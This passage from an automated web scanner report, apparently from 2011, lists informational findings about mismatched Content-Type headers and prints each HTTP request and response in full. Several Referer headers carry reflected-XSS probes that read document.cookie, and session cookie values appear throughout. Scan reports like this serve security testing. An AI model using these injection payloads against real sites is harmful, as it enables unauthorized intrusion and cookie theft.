Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 00:08:05 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 53
Connection: Close

error: Required string parameter 'key' is not present

27.6. https://arbor.custhelp.com/ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:05:14 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Sat, 05 Mar 2011 00:05:14 GMT
Content-Length: 708
RNT-Time: D=102042 t=1296691514864068
RNT-Machine: 04
Content-Type: application/opensearchdescription+xml; charset="utf-8"
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

27.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Tue, 03-May-2011 20:25:38 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:25:38 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

27.8. http://cdn.invisionpower.com/public/min/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.invisionpower.com
Path:   /public/min/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/min/index.php?ipbv=31007&charset=iso-8859-1&f=public/js/ipb.js,public/js/ips.quickpm.js,public/js/ips.sharelinks.js,public/js/ips.blog.js,public/js/ips.rating.js,public/js/ips.like.js,public/js/ips.hovercard.js,public/js/ips.comments.js,cache/lang_cache/1/ipb.lang.js HTTP/1.1
Host: cdn.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'%3E%3Cscript%3Ealert(1)%3C/script%3E5b968c91723=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156

Response

HTTP/1.1 504 Gateway Time-out
Content-Length: 415
Content-Type: text/html
Server: Footprint Distributor V4.6
Date: Thu, 03 Feb 2011 01:57:55 GMT
Connection: keep-alive

An HTTP error occurred while getting: <p><strong>http://cdn.invisionpower.com/public/min/index.php?ipbv=31007&charset=iso-8859-1&f=public/js/ipb.js,public/js/ips.quickpm.js,public/js/ips.sharelinks.js
...[SNIP]...

27.9. http://chat.livechatinc.net/licence/1043255/script.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://chat.livechatinc.net
Path:   /licence/1043255/script.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /licence/1043255/script.cgi?lang=en&groups=0 HTTP/1.1
Host: chat.livechatinc.net
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript;
Set-Cookie: lc_session=S1296685494.aa93f77b42&lc_last_visit=1296685494&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Fri, 01-Feb-2013 23:24:54 GMT; domain=chat.livechatinc.net;
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 11722
Connection: Keep-Alive

if(typeof __lc_loaded=='undefined'){var __lc_loaded=true;
eval((function(s){var a,c,e,i,j,o="",r,t=".......................@`~";for(i=0;i<s.length;i++){r=t+s[i][2];a=s[i][1].split(".");for(j=a.length
...[SNIP]...

27.10. http://community.invisionpower.com/clickheat/click.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /clickheat/click.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /clickheat/click.php HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:44:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 26
Connection: close
Content-Type: text/html

Parameters or config error

27.11. http://community.invisionpower.com/public/js/3rd_party/prettify/lang-sql.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /public/js/3rd_party/prettify/lang-sql.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /public/js/3rd_party/prettify/lang-sql.js HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568; cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Tue, 04 May 2010 17:17:42 GMT
ETag: "6c3-485c7e31a9980"
Accept-Ranges: bytes
Content-Length: 1731
Cache-Control: max-age=31536000
Expires: Thu, 02 Feb 2012 22:25:36 GMT
Content-Type: application/javascript

PR.registerLangHandler(PR.createSimpleLexer([[PR.PR_PLAIN,/^[\t\n\r \xA0]+/,null,'    \n\r \xa0'],[PR.PR_STRING,/^(?:"(?:[^\"\\]|\\.)*"|'(?:[^\'\\]|\\.)*')/,null,'\"\'']],[[PR.PR_COMMENT,/^(?:--[^\r\n]*|
...[SNIP]...

27.12. https://content.pncmc.com/live/pnc/mastheads/flashMastheads/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://content.pncmc.com
Path:   /live/pnc/mastheads/flashMastheads/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /live/pnc/mastheads/flashMastheads/ HTTP/1.1
Host: content.pncmc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 02 Feb 2011 22:09:55 GMT
Content-Length: 15
Connection: close

File not found.

27.13. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/director/sw.cab

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT
ETag: "e6016-25803-94636640"
Accept-Ranges: bytes
Content-Length: 153603
Content-Type: text/plain
Expires: Thu, 03 Feb 2011 01:02:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 01:02:23 GMT
Connection: close

MSCF.....F......D............................F..............|.................V=..!.swdir.inf...........V=r. .installer.exe.q...tO..CK..}|T..?|.%..&. ....!(......t.9.....2.B..L..!I.sxi.$..2.F.........
...[SNIP]...

27.14. http://evsecure-aia.verisign.com/EVSecure2006.cer  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://evsecure-aia.verisign.com
Path:   /EVSecure2006.cer

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /EVSecure2006.cer HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Proxy-Connection: Keep-Alive
Host: evsecure-aia.verisign.com

Response

HTTP/1.0 200 OK
Age: 348
Date: Wed, 02 Feb 2011 21:55:17 GMT
Connection: Keep-Alive
Via: NS-248
ETag: "2ac107-5e8-43c4a200"
Server: Apache/2.2.2 (Unix)
Last-Modified: Fri, 01 Dec 2006 22:10:16 GMT
Accept-Ranges: bytes
Content-Length: 1512
Content-Type: text/plain
X-Cache: MISS from hostname

0...0..........[wY....^.'.2.)(k0.    *.H.......0..1.0    ..U....US1.0...U.
..VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign
...[SNIP]...

27.15. http://fx-rate.net/fx-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fx-rate.net
Path:   /fx-rates.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /fx-rates.php?label_type=country_name&currency=HKD&length=short HTTP/1.1
Host: fx-rate.net
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:11 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4116


var form_content = '<center>    <style>    .WNtopmenu2 {width: 187px; line-height:17px; background-color: #eeeeee;border-collapse:collapse;}    .WNrow1 {background: #ffffff;}    .WNcol1a {width: 75%; font-fam
...[SNIP]...

27.16. http://image.wareseeker.com/software/wii/abc/index_3be9d26a20-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/abc/index_3be9d26a20-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/abc/index_3be9d26a20-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:27 GMT
Content-Type: image/gif
Content-Length: 1898
Last-Modified: Sat, 24 Oct 2009 04:50:28 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:27 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.17. http://image.wareseeker.com/software/wii/abc/index_3beab2d827-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/abc/index_3beab2d827-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/abc/index_3beab2d827-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:25 GMT
Content-Type: image/gif
Content-Length: 1898
Last-Modified: Sun, 11 Oct 2009 08:55:05 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:25 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.18. http://image.wareseeker.com/software/wii/avatar/index_37932e028-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/avatar/index_37932e028-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/avatar/index_37932e028-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:25 GMT
Content-Type: image/gif
Content-Length: 1783
Last-Modified: Thu, 27 May 2010 07:47:45 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:25 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.19. http://image.wareseeker.com/software/wii/avatar/index_3bf358a284-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/avatar/index_3bf358a284-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/avatar/index_3bf358a284-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:25 GMT
Content-Type: image/gif
Content-Length: 1783
Last-Modified: Thu, 13 May 2010 10:32:32 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:25 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.20. http://image.wareseeker.com/software/wii/avatar/index_3bf57e24dc-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/avatar/index_3bf57e24dc-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/avatar/index_3bf57e24dc-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:27 GMT
Content-Type: image/gif
Content-Length: 1783
Last-Modified: Wed, 07 Apr 2010 01:37:02 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:27 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.21. http://image.wareseeker.com/software/wii/hot/index_37e93d637-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/hot/index_37e93d637-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/hot/index_37e93d637-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:25 GMT
Content-Type: image/gif
Content-Length: 1905
Last-Modified: Mon, 30 Aug 2010 09:55:12 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:25 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.22. http://image.wareseeker.com/software/wii/hot/index_3837e34dd-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/hot/index_3837e34dd-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/hot/index_3837e34dd-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:25 GMT
Content-Type: image/gif
Content-Length: 1905
Last-Modified: Thu, 11 Nov 2010 00:35:19 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:25 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.23. http://image.wareseeker.com/software/wii/hot/index_3866c73c1-fasm.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image.wareseeker.com
Path:   /software/wii/hot/index_3866c73c1-fasm.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /software/wii/hot/index_3866c73c1-fasm.gif HTTP/1.1
Host: image.wareseeker.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BHS204
Date: Thu, 03 Feb 2011 01:24:25 GMT
Content-Type: image/gif
Content-Length: 1905
Last-Modified: Mon, 03 Jan 2011 15:19:55 GMT
Connection: keep-alive
Expires: Sun, 31 Jan 2021 01:24:25 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

27.24. http://news.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://news.google.com
Path:   /complete/search

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /complete/search?hl=en&gl=us&ds=n&nolabels=t&hjson=t&client=news&q= HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:15 GMT
Expires: Thu, 03 Feb 2011 01:04:15 GMT
Cache-Control: private, max-age=3600
Content-Type: application/json; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

